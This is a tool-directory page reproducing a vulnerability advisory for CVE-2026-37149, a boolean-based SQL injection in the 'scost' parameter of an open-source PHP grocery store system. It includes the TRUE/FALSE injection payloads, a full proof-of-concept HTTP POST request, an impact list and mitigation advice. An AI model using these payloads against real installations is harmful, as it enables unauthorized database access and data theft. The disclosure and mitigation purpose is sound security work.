Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-37149 — CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0. | Kitploit
Tools/GitHubGitHub/pateldhyeyit/cve-2026-37149
Vulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationDatabase Security
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - SQL Injection vulnerability in the scost parameter of search_products.php in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0.

View Repository
222 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-37149 SQL Injection in GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0

Overview

CVE ID: CVE-2026-37149 Vulnerability Type: SQL Injection (CWE-89) Severity: High Discoverer: Dhyey Patel

Description

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 contains a SQL Injection vulnerability in the "scost" parameter of "/grocery/search_products.php".

The application fails to properly validate user-supplied input before embedding it into SQL queries. An attacker can inject crafted SQL expressions through the vulnerable parameter and manipulate backend database queries.

Successful exploitation may allow unauthorized access to sensitive database information and execution of arbitrary SQL statements.

Affected Product

Product: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN

Version: v1.0

Vendor Repository:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

Affected Component

  • "/grocery/search_products.php"
  • POST parameter: "scost"

Attack Type Remote

Vendor Information Open-source project maintained by the repository owner: https://github.com/anirudhkannanvp

Technical Details

The vulnerability was confirmed using Boolean-based SQL Injection techniques.

TRUE Condition Payload

-1 OR 321=6 AND 000483=000483 --

FALSE Condition Payload

-1 OR 320=6 AND 000483=000483 --

Application responses differed based on whether the injected condition evaluated to TRUE or FALSE, confirming SQL Injection.

Further testing confirmed successful execution of SQL functions including:

SELECT database()

The database name returned was:

grocery

This demonstrates that arbitrary SQL queries can be executed through the vulnerable parameter.

Proof of Concept

Request

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

Result

The response changes according to the injected Boolean condition, confirming SQL Injection in the "scost" parameter.

Impact

Potential impacts include:

  • Database Enumeration
  • Sensitive Information Disclosure
  • Authentication Bypass
  • Data Extraction
  • Modification of Database Records

Mitigation

Developers should:

  1. Use prepared statements.
  2. Use parameterized SQL queries.
  3. Validate numeric input parameters.
  4. Implement server-side input validation.
  5. Avoid direct concatenation of user-controlled input into SQL statements.

References OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE Program https://www.cve.org

Credits Discovered and reported by: Dhyey Patel

Download Tool